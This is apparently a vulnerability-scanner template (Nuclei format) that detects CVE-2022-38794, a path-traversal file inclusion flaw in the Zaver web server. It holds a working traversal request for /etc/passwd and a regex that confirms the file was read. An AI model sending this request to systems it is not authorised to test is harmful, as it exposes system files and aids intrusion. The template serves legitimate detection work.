43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
id: CVE-2022-38794
|
|
|
|
info:
|
|
name: Zaver - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: |
|
|
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
|
|
remediation: |
|
|
To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
|
|
reference:
|
|
- https://github.com/zyearn/zaver/issues/22
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-38794
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0046
|
|
epss-percentile: 0.72582
|
|
cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zaver_project
|
|
product: zaver
|
|
tags: cve,cve2022,lfi,zaver
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/../../../../../../../../etc/passwd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502200daa60745e00d95520816cc078b78c9d9e7e888bdf8c055ead1f9e501b486e32022100f5552059737406c16a91a3848e9fa342d6878a9ff1b1aa86fd7fb03abf7ad521:922c64590222798bb761d5b6d8e72950 |